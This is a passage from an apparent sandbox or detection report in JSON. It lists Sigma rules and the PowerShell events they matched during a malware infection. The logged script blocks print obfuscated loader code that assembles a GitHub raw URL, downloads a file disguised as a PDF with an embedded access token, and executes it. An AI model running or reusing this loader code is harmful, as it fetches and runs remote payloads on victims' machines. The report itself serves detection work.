}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "$VIUSBvejbawf = \"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 1 [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "85d62d20-3973-47f4-8ce4-0835db8caaec",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"Path": "C:\\Users\\azure\\AppData\\Roaming\\firefox.ps1",
"ScriptBlockId": "3b915775-03e4-45e0-8557-f47a61e601b9",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$VIUSBvejbawf = \"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 1 [TRUNCATED]",
"Path": "",
"ScriptBlockId": "229e1e92-0db6-4cb6-8e02-9d51a641b840",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a3b3e22e-686b-46a0-a40e-58e067e974d4",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$VIUSBvejbawf = \"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 1 [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "2064c2c0-8c3e-4c17-9b08-7a213679007f",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "60d527fe5a592cbe8e98428d1412743b909d5625ec8bc91d20e8b6ee8b36db20",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Create Scheduled Task",
"rule_description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"Path": "C:\\Users\\azure\\AppData\\Roaming\\firefox.ps1",
"ScriptBlockId": "3b915775-03e4-45e0-8557-f47a61e601b9",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a3b3e22e-686b-46a0-a40e-58e067e974d4",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "1f5b0260-b64c-4c71-919a-50f95fc9230c",
"Path": "C:\\Users\\DeiYyGyatKlH\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "3b915775-03e4-45e0-8557-f47a61e601b9",
"Path": "C:\\Users\\azure\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a3b3e22e-686b-46a0-a40e-58e067e974d4",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"ScriptBlockId": "eaea2ba0-04ac-4d70-9840-73066d7d03e1",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$hhh=Join-Path ([System.IO.Path]::GetTempPath()) \"Pumpfun-AI-Attack-Defence-Requirements.pdf\";$tkf=\"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\";$bstr=\"ht\"+\"tp\"+\"s:\"+\"/\"+\"/\"+\"r\"+\"a\"+\"w.githu\"+\"bu\"+\"se\"+\"rcon\"+\"t\"+\"en\"+\"t.c\"+\"om/\"+\"br\"+\"andon\"+\"lee\"+\"odd\"+\"93-\"+\"blip/do\"+\"c\"+\"7/m\"+\"a\"+\"in/\";$rstr=$bstr+\"view.pdf\";$hrs = @{Authorization=\"token $tkf\";srjidc=\"dsghjkgekjhgegegegr\";Accept=\"application/vnd.github.v3.raw\"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($e [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "1f5b0260-b64c-4c71-919a-50f95fc9230c",
"Path": "C:\\Users\\DeiYyGyatKlH\\AppData\\Roaming\\firefox.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6e1823de286f8bef414c648f5738bec3bd40700cba3765da26e6500bc2d8e387",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Detect Virtualization Environment",
"rule_description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n",
"rule_author": "frack113, Duc.Le-GTSC",
"match_context": [
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\<USER>\\AppData\\Roaming\\firefox.ps1",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\wale.ps1"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"EventID": "11"
}
}
]
},
{
"rule_level": "low",
"rule_id": "80e1441e8251586c742da610b4bceb4d94fbe79f4e8b64b9745b6a11da90d7c1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script With File Upload Capabilities",
"rule_description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Get the processes that are running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
